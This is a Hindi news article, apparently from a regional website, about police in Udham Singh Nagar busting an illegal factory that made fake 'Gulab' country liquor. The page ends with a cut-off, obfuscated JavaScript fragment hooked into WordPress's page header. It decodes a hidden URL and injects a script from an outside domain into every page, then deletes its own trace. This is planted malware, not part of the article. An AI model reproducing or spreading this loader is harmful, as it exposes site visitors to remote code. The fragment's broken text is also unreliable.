Saturday, July 27, 2024
spot_img

आबकारी विभाग को चूना लगा रही अवैध शराब की फैक्ट्रियां! अब पुलिस ने किया भांडाफोड, आबकारी विभाग बैठा मौन

जनपद ऊधम सिंह नगर में जहां आबकारी विभाग द्वारा आवंटित सरकारी शराब की दुकाने लगातार घाटे में जा रही है और कई दुकानें तो घाटे के चलते बंद भी हो गई है वहीं इस घाटे की वजह शायद जानने की जहमत कभी आबकारी विभाग ने नहीं उठाई जबकि जिले में अवैध शराब की फैक्ट्री संचालित हो रही है, जिसकी भनक तक आबकारी विभाग को नहीं है वहीं अब पुलिस के नेटवर्क से अवैध शराब की फैक्ट्री का भंडाफोड़ किया गया है। ऊधम सिंह नगर पुलिस ने अवैध देशी शराब की फैक्ट्री का भंडाफोड़ करते हुए 4 पुरुष और 2 महिलाओं को गिरफ्तार कर उनके कब्जे से 112 पेटी अवैध शराब तथा शराब बनाने के विभिन्न उपकरण और मशीनें कब्जे में ली है, गूलरभोज में चल रही इस फैक्ट्री में नकली शराब का काम जोरों पर चल रहा था, यहां केमिकल से शराब बनाकर लोगों की जान से खिलवाड़ किया जा रहा था। उत्तराखंड में बनने वाली देशी शराब गुलाब ब्रांड जो कि उत्तराखंड के सरकारी ठेकों पर विक्रय की जाती है, उसी की तर्ज पर नकली गुलाब ब्रांड की देसी शराब फैक्ट्री में बनाई जा रही थी, वही इस मामले का खुलासा करते हुए एसएसपी मंजूनाथ टी सी ने बताया कि शराब बनाने के लिए इस्तेमाल किए जाने वाले केमिकल एथायल को आईजीएल से निकालने के लिए ट्रकों के ड्राइवर से समझौता कर उसका स्टॉक किया जाता था जिससे प्रतीत होता है कि कहीं ना कहीं आईजीएल के अधिकारी भी इसमें शामिल है, इसकी जांच भी सीईओ बाजपुर को सौंप दी गई है, वहीं एसएसपी ने पुलिसकर्मियों की सराहना करते हुए 2500 के इनाम की घोषणा की।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>